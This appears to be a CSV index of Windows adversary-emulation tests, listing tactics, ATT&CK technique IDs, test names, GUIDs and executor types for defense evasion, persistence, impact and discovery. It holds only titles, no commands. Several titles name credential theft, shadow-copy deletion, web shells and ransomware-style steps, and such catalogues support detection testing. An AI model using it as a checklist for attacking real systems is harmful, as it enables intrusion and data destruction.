defense-evasion,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
defense-evasion,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
defense-evasion,T1216.001,PubPrn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16-4862-be83-913b10a88f6c,command_prompt
defense-evasion,T1218.009,Regsvcs/Regasm,1,Regasm Uninstall Method Call Test,71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112,command_prompt
defense-evasion,T1218.009,Regsvcs/Regasm,2,Regsvcs Uninstall Method Call Test,fd3c1c6a-02d2-4b72-82d9-71c527abb126,powershell
defense-evasion,T1218.010,Regsvr32,1,Regsvr32 local COM scriptlet execution,449aa403-6aba-47ce-8a37-247d21ef0306,command_prompt
defense-evasion,T1218.010,Regsvr32,2,Regsvr32 remote COM scriptlet execution,c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36,command_prompt
defense-evasion,T1218.010,Regsvr32,3,Regsvr32 local DLL execution,08ffca73-9a3d-471a-aeb0-68b4aa3ab37b,command_prompt
defense-evasion,T1218.010,Regsvr32,4,Regsvr32 Registering Non DLL,1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421,command_prompt
defense-evasion,T1218.010,Regsvr32,5,Regsvr32 Silent DLL Install Call DllRegisterServer,9d71c492-ea2e-4c08-af16-c6994cdf029f,command_prompt
defense-evasion,T1036.003,Rename System Utilities,1,Masquerading as Windows LSASS process,5ba5a3d1-cf3c-4499-968a-a93155d1f717,command_prompt
defense-evasion,T1036.003,Rename System Utilities,3,Masquerading - cscript.exe running as notepad.exe,3a2a578b-0a01-46e4-92e3-62e2859b42f0,command_prompt
defense-evasion,T1036.003,Rename System Utilities,4,Masquerading - wscript.exe running as svchost.exe,24136435-c91a-4ede-9da1-8b284a1c1a23,command_prompt
defense-evasion,T1036.003,Rename System Utilities,5,Masquerading - powershell.exe running as taskhostw.exe,ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa,command_prompt
defense-evasion,T1036.003,Rename System Utilities,6,Masquerading - non-windows exe running as windows exe,bc15c13f-d121-4b1f-8c7d-28d95854d086,powershell
defense-evasion,T1036.003,Rename System Utilities,7,Masquerading - windows exe running as different windows exe,c3d24a39-2bfe-4c6a-b064-90cd73896cb0,powershell
defense-evasion,T1036.003,Rename System Utilities,8,Malicious process Masquerading as LSM.exe,83810c46-f45e-4485-9ab6-8ed0e9e6ed7f,command_prompt
defense-evasion,T1036.003,Rename System Utilities,9,File Extension Masquerading,c7fa0c3b-b57f-4cba-9118-863bf4e653fc,command_prompt
defense-evasion,T1207,Rogue Domain Controller,1,DCShadow (Active Directory),0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,powershell
defense-evasion,T1014,Rootkit,3,Windows Signed Driver Rootkit Test,8e4e1985-9a19-4529-b4b8-b7a49ff87fae,command_prompt
defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be,command_prompt
defense-evasion,T1218.011,Rundll32,2,Rundll32 execute VBscript command,638730e7-7aed-43dc-bf8c-8117f805f5bb,command_prompt
defense-evasion,T1218.011,Rundll32,3,Rundll32 advpack.dll Execution,d91cae26-7fc1-457b-a854-34c8aad48c89,command_prompt
defense-evasion,T1218.011,Rundll32,4,Rundll32 ieadvpack.dll Execution,5e46a58e-cbf6-45ef-a289-ed7754603df9,command_prompt
defense-evasion,T1218.011,Rundll32,5,Rundll32 syssetup.dll Execution,41fa324a-3946-401e-bbdd-d7991c628125,command_prompt
defense-evasion,T1218.011,Rundll32,6,Rundll32 setupapi.dll Execution,71d771cd-d6b3-4f34-bc76-a63d47a10b19,command_prompt
defense-evasion,T1218.011,Rundll32,7,Execution of HTA and VBS Files using Rundll32 and URL.dll,22cfde89-befe-4e15-9753-47306b37a6e3,command_prompt
defense-evasion,T1218.011,Rundll32,8,Launches an executable using Rundll32 and pcwutl.dll,9f5d081a-ee5a-42f9-a04e-b7bdc487e676,command_prompt
defense-evasion,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
defense-evasion,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,1,mavinject - Inject DLL into running process,c426dacf-575d-4937-8611-a148a86a5e61,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,2,SyncAppvPublishingServer - Execute arbitrary PowerShell code,d590097e-d402-44e2-ad72-2c6aa1ce78b1,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,3,Register-CimProvider - Execute evil dll,ad2c17ed-f626-4061-b21e-b9804a6f3655,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,4,InfDefaultInstall.exe .inf Execution,54ad7d5a-a1b5-472c-b6c4-f8090fb2daef,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,5,ProtocolHandler.exe Downloaded a Suspicious File,db020456-125b-4c8b-a4a7-487df8afb5a2,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,6,Microsoft.Workflow.Compiler.exe Payload Execution,7cbb0f26-a4c1-4f77-b180-a009aa05637e,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,7,Renamed Microsoft.Workflow.Compiler.exe Payload Executions,4cc40fd7-87b8-4b16-b2d7-57534b86b911,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,8,Invoke-ATHRemoteFXvGPUDisablementCommand base test,9ebe7901-7edf-45c0-b5c7-8366300919db,powershell
defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt
defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt
defense-evasion,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
defense-evasion,T1221,Template Injection,1,WINWORD Remote Template Injection,1489e08a-82c7-44ee-b769-51b72d03521d,command_prompt
defense-evasion,T1070.006,Timestomp,5,Windows - Modify file creation timestamp with PowerShell,b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c,powershell
defense-evasion,T1070.006,Timestomp,6,Windows - Modify file last modified timestamp with PowerShell,f8f6634d-93e1-4238-8510-f8a90a20dcf2,powershell
defense-evasion,T1070.006,Timestomp,7,Windows - Modify file last access timestamp with PowerShell,da627f63-b9bd-4431-b6f8-c5b44d061a62,powershell
defense-evasion,T1070.006,Timestomp,8,Windows - Timestomp a File,d7512c33-3a75-4806-9893-69abc3ccdd43,powershell
defense-evasion,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
defense-evasion,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
defense-evasion,T1222.001,Windows File and Directory Permissions Modification,1,Take ownership using takeown utility,98d34bb4-6e75-42ad-9c41-1dae7dc6a001,command_prompt
defense-evasion,T1222.001,Windows File and Directory Permissions Modification,2,cacls - Grant permission to specified user or group recursively,a8206bcc-f282-40a9-a389-05d9c0263485,command_prompt
defense-evasion,T1222.001,Windows File and Directory Permissions Modification,3,attrib - Remove read-only attribute,bec1e95c-83aa-492e-ab77-60c71bbd21b0,command_prompt
defense-evasion,T1222.001,Windows File and Directory Permissions Modification,4,attrib - hide file,32b979da-7b68-42c9-9a99-0e39900fc36c,command_prompt
defense-evasion,T1222.001,Windows File and Directory Permissions Modification,5,Grant Full Access to folder for Everyone - Ryuk Ransomware Style,ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6,command_prompt
defense-evasion,T1220,XSL Script Processing,1,MSXSL Bypass using local files,ca23bfb2-023f-49c5-8802-e66997de462d,command_prompt
defense-evasion,T1220,XSL Script Processing,2,MSXSL Bypass using remote files,a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985,command_prompt
defense-evasion,T1220,XSL Script Processing,3,WMIC bypass using local XSL file,1b237334-3e21-4a0c-8178-b8c996124988,command_prompt
defense-evasion,T1220,XSL Script Processing,4,WMIC bypass using remote XSL file,7f5be499-33be-4129-a560-66021f379b9b,command_prompt
persistence,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
persistence,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
persistence,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
persistence,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
persistence,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
persistence,T1546.011,Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell
persistence,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
persistence,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
persistence,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
persistence,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
persistence,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
persistence,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
persistence,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
persistence,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
persistence,T1136.002,Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
persistence,T1136.002,Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
persistence,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
persistence,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
persistence,T1136.001,Local Account,3,Create a new user in a command prompt,6657864e-0323-4206-9344-ac9cd7265a4f,command_prompt
persistence,T1136.001,Local Account,4,Create a new user in PowerShell,bc8be0ac-475c-4fbf-9b1d-9fffd77afbde,powershell
persistence,T1136.001,Local Account,6,Create a new Windows admin user,fda74566-a604-4581-a4cc-fbbe21d66559,command_prompt
persistence,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
persistence,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
persistence,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
persistence,T1137,Office Application Startup,1,Office Application Startup - Outlook as a C2,bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c,command_prompt
persistence,T1137.002,Office Test,1,Office Application Startup Test Persistence,c3e35b58-fe1c-480b-b540-7600fb612563,command_prompt
persistence,T1137.004,Outlook Home Page,1,Install Outlook Home Page Persistence,7a91ad51-e6d2-4d43-9471-f26362f5738e,command_prompt
persistence,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
persistence,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
persistence,T1547.010,Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt
persistence,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
persistence,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt
persistence,T1547.001,Registry Run Keys / Startup Folder,2,Reg Key RunOnce,554cbd88-cde1-4b56-8168-0be552eed9eb,command_prompt
persistence,T1547.001,Registry Run Keys / Startup Folder,3,PowerShell Registry RunOnce,eb44f842-0457-4ddc-9b92-c4caa144ac42,powershell
persistence,T1547.001,Registry Run Keys / Startup Folder,4,Suspicious vbs file run from startup Folder,2cb98256-625e-4da9-9d44-f2e5f90b8bd5,powershell
persistence,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell
persistence,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell
persistence,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell
persistence,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
persistence,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
persistence,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
persistence,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
persistence,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
persistence,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
persistence,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
persistence,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
persistence,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
persistence,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
persistence,T1547.009,Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
persistence,T1547.009,Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
persistence,T1505.002,Transport Agent,1,Install MS Exchange Transport Agent Persistence,43e92449-ff60-46e9-83a3-1a38089df94d,powershell
persistence,T1505.003,Web Shell,1,Web Shell Written to Disk,0a2ce662-1efa-496f-a472-2fe7b080db16,command_prompt
persistence,T1546.003,Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
persistence,T1543.003,Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
persistence,T1543.003,Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
persistence,T1543.003,Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
persistence,T1547.004,Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
persistence,T1547.004,Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
persistence,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
impact,T1531,Account Access Removal,1,Change User Password - Windows,1b99ef28-f83c-4ec5-8a08-1a56263a5bb2,command_prompt
impact,T1531,Account Access Removal,2,Delete User - Windows,f21a1d7d-a62f-442a-8c3a-2440d43b19e5,command_prompt
impact,T1531,Account Access Removal,3,Remove Account From Domain Admin Group,43f71395-6c37-498e-ab17-897d814a0947,powershell
impact,T1485,Data Destruction,1,Windows - Overwrite file with Sysinternals SDelete,476419b5-aebf-4366-a131-ae3e8dae5fc2,powershell
impact,T1486,Data Encrypted for Impact,5,PureLocker Ransom Note,649349c7-9abf-493b-a7a2-b1aa4d141528,command_prompt
impact,T1490,Inhibit System Recovery,1,Windows - Delete Volume Shadow Copies,43819286-91a9-4369-90ed-d31fb4da2c01,command_prompt
impact,T1490,Inhibit System Recovery,2,Windows - Delete Volume Shadow Copies via WMI,6a3ff8dd-f49c-4272-a658-11c2fe58bd88,command_prompt
impact,T1490,Inhibit System Recovery,3,Windows - wbadmin Delete Windows Backup Catalog,263ba6cb-ea2b-41c9-9d4e-b652dadd002c,command_prompt
impact,T1490,Inhibit System Recovery,4,Windows - Disable Windows Recovery Console Repair,cf21060a-80b3-4238-a595-22525de4ab81,command_prompt
impact,T1490,Inhibit System Recovery,5,Windows - Delete Volume Shadow Copies via WMI with PowerShell,39a295ca-7059-4a88-86f6-09556c1211e7,powershell
impact,T1490,Inhibit System Recovery,6,Windows - Delete Backup Files,6b1dbaf6-cc8a-4ea6-891f-6058569653bf,command_prompt
impact,T1490,Inhibit System Recovery,7,Windows - wbadmin Delete systemstatebackup,584331dd-75bc-4c02-9e0b-17f5fd81c748,command_prompt
impact,T1491.001,Internal Defacement,1,Replace Desktop Wallpaper,30558d53-9d76-41c4-9267-a7bd5184bed3,powershell
impact,T1489,Service Stop,1,Windows - Stop service using Service Controller,21dfb440-830d-4c86-a3e5-2a491d5a8d04,command_prompt
impact,T1489,Service Stop,2,Windows - Stop service using net.exe,41274289-ec9c-4213-bea4-e43c4aa57954,command_prompt
impact,T1489,Service Stop,3,Windows - Stop service by killing process,f3191b84-c38b-400b-867e-3a217a27795f,command_prompt
impact,T1529,System Shutdown/Reboot,1,Shutdown System - Windows,ad254fa8-45c0-403b-8c77-e00b3d3e7a64,command_prompt
impact,T1529,System Shutdown/Reboot,2,Restart System - Windows,f4648f0d-bf78-483c-bafc-3ec99cd1c302,command_prompt
discovery,T1010,Application Window Discovery,1,List Process Main Windows - C# .NET,fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4,command_prompt
discovery,T1217,Browser Bookmark Discovery,4,List Google Chrome Bookmarks on Windows with powershell,faab755e-4299-48ec-8202-fc7885eb6545,powershell
discovery,T1217,Browser Bookmark Discovery,5,List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt,76f71e2f-480e-4bed-b61e-398fe17499d5,command_prompt
discovery,T1217,Browser Bookmark Discovery,6,List Mozilla Firefox bookmarks on Windows with command prompt,4312cdbc-79fc-4a9c-becc-53d49c734bc5,command_prompt
discovery,T1217,Browser Bookmark Discovery,7,List Internet Explorer Bookmarks using the command prompt,727dbcdb-e495-4ab1-a6c4-80c7f77aef85,command_prompt
discovery,T1087.002,Domain Account,1,Enumerate all accounts (Domain),6fbc9e68-5ad7-444a-bd11-8bf3136c477e,command_prompt
discovery,T1087.002,Domain Account,2,Enumerate all accounts via PowerShell (Domain),8b8a6449-be98-4f42-afd2-dedddc7453b2,powershell
discovery,T1087.002,Domain Account,3,Enumerate logged on users via CMD (Domain),161dcd85-d014-4f5e-900c-d3eaae82a0f7,command_prompt
discovery,T1087.002,Domain Account,4,Automated AD Recon (ADRecon),95018438-454a-468c-a0fa-59c800149b59,powershell
discovery,T1087.002,Domain Account,5,Adfind -Listing password policy,736b4f53-f400-4c22-855d-1a6b5a551600,command_prompt
discovery,T1087.002,Domain Account,6,Adfind - Enumerate Active Directory Admins,b95fd967-4e62-4109-b48d-265edfd28c3a,command_prompt
discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Objects,e1ec8d20-509a-4b9a-b820-06c9b2da8eb7,command_prompt
discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt
discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt
discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell
discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
discovery,T1069.002,Domain Groups,4,Find machines where user has local admin access (PowerView),a2d71eee-a353-4232-9f86-54f4288dd8c1,powershell
discovery,T1069.002,Domain Groups,5,Find local admins on all machines in domain (PowerView),a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd,powershell
discovery,T1069.002,Domain Groups,6,Find Local Admins via Group Policy (PowerView),64fdb43b-5259-467a-b000-1b02c00e510a,powershell
discovery,T1069.002,Domain Groups,7,Enumerate Users Not Requiring Pre Auth (ASRepRoast),870ba71e-6858-4f6d-895c-bb6237f6121b,powershell
discovery,T1069.002,Domain Groups,8,Adfind - Query Active Directory Groups,48ddc687-82af-40b7-8472-ff1e742e8274,command_prompt
discovery,T1482,Domain Trust Discovery,1,Windows - Discover domain trusts with dsquery,4700a710-c821-4e17-a3ec-9e4c81d6845f,command_prompt
discovery,T1482,Domain Trust Discovery,2,Windows - Discover domain trusts with nltest,2e22641d-0498-48d2-b9ff-c71e496ccdbe,command_prompt
discovery,T1482,Domain Trust Discovery,3,Powershell enumerate domains and forests,c58fbc62-8a62-489e-8f2d-3565d7d96f30,powershell
discovery,T1482,Domain Trust Discovery,4,Adfind - Enumerate Active Directory OUs,d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec,command_prompt
discovery,T1482,Domain Trust Discovery,5,Adfind - Enumerate Active Directory Trusts,15fe436d-e771-4ff3-b655-2dca9ba52834,command_prompt
discovery,T1083,File and Directory Discovery,1,File and Directory Discovery (cmd.exe),0e36303b-6762-4500-b003-127743b80ba6,command_prompt
discovery,T1083,File and Directory Discovery,2,File and Directory Discovery (PowerShell),2158908e-b7ef-4c21-8a83-3ce4dd05a924,powershell
discovery,T1087.001,Local Account,8,Enumerate all accounts on Windows (Local),80887bec-5a9b-4efc-a81d-f83eb2eb32ab,command_prompt
discovery,T1087.001,Local Account,9,Enumerate all accounts via PowerShell (Local),ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b,powershell
discovery,T1087.001,Local Account,10,Enumerate logged on users via CMD (Local),a138085e-bfe5-46ba-a242-74a6fb884af3,command_prompt
discovery,T1087.001,Local Account,11,Enumerate logged on users via PowerShell,2bdc42c7-8907-40c2-9c2b-42919a00fe03,powershell
discovery,T1069.001,Local Groups,2,Basic Permission Groups Discovery Windows (Local),1f454dd6-e134-44df-bebb-67de70fb6cd8,command_prompt
discovery,T1069.001,Local Groups,3,Permission Groups Discovery PowerShell (Local),a580462d-2c19-4bc7-8b9a-57a41b7d3ba4,powershell
discovery,T1046,Network Service Scanning,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
discovery,T1046,Network Service Scanning,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
discovery,T1135,Network Share Discovery,3,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt
discovery,T1135,Network Share Discovery,4,Network Share Discovery PowerShell,1b0814d1-bb24-402d-9615-1b20c50733fb,powershell
discovery,T1135,Network Share Discovery,5,View available share drives,ab39a04f-0c93-4540-9ff2-83f862c385ae,command_prompt
discovery,T1135,Network Share Discovery,6,Share Discovery with PowerView,b1636f0a-ba82-435c-b699-0d78794d8bfd,powershell
discovery,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
discovery,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
discovery,T1201,Password Policy Discovery,5,Examine local password policy - Windows,4588d243-f24e-4549-b2e3-e627acc089f6,command_prompt
discovery,T1201,Password Policy Discovery,6,Examine domain password policy - Windows,46c2c362-2679-4ef5-aec9-0e958e135be4,command_prompt
discovery,T1120,Peripheral Device Discovery,1,Win32_PnPEntity Hardware Inventory,2cb4dbf2-2dca-4597-8678-4d39d207a3a5,powershell
discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt
discovery,T1012,Query Registry,1,Query Registry,8f7578c4-9863-4d83-875c-a565573bbdf0,command_prompt
discovery,T1018,Remote System Discovery,1,Remote System Discovery - net,85321a9c-897f-4a60-9f20-29788e50bccd,command_prompt
discovery,T1018,Remote System Discovery,2,Remote System Discovery - net group Domain Computers,f1bf6c8f-9016-4edf-aff9-80b65f5d711f,command_prompt
discovery,T1018,Remote System Discovery,3,Remote System Discovery - nltest,52ab5108-3f6f-42fb-8ba3-73bc054f22c8,command_prompt
discovery,T1018,Remote System Discovery,4,Remote System Discovery - ping sweep,6db1f57f-d1d5-4223-8a66-55c9c65a9592,command_prompt
discovery,T1018,Remote System Discovery,5,Remote System Discovery - arp,2d5a61f5-0447-4be4-944a-1f8530ed6574,command_prompt
discovery,T1018,Remote System Discovery,8,Remote System Discovery - nslookup,baa01aaa-5e13-45ec-8a0d-e46c93c9760f,powershell
discovery,T1018,Remote System Discovery,9,Remote System Discovery - adidnsdump,95e19466-469e-4316-86d2-1dc401b5a959,command_prompt
discovery,T1018,Remote System Discovery,10,Adfind - Enumerate Active Directory Computer Objects,a889f5be-2d54-4050-bd05-884578748bb4,command_prompt
discovery,T1018,Remote System Discovery,11,Adfind - Enumerate Active Directory Domain Controller Objects,5838c31e-a0e2-4b9f-b60a-d79d2cb7995e,command_prompt
discovery,T1518.001,Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
discovery,T1518.001,Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
discovery,T1518.001,Security Software Discovery,5,Security Software Discovery - Sysmon Service,fe613cf3-8009-4446-9a0f-bc78a15b66c9,command_prompt
discovery,T1518.001,Security Software Discovery,6,Security Software Discovery - AV Discovery via WMI,1553252f-14ea-4d3b-8a08-d7a4211aa945,command_prompt
discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt
discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell
discovery,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
discovery,T1082,System Information Discovery,1,System Information Discovery,66703791-c902-4560-8770-42b8a91f7667,command_prompt
discovery,T1082,System Information Discovery,6,Hostname Discovery (Windows),85cfbf23-4a1e-4342-8792-007e004b975f,command_prompt
discovery,T1082,System Information Discovery,8,Windows MachineGUID Discovery,224b4daf-db44-404e-b6b2-f4d1f0126ef8,command_prompt
discovery,T1082,System Information Discovery,9,Griffon Recon,69bd4abe-8759-49a6-8d21-0f15822d6370,powershell
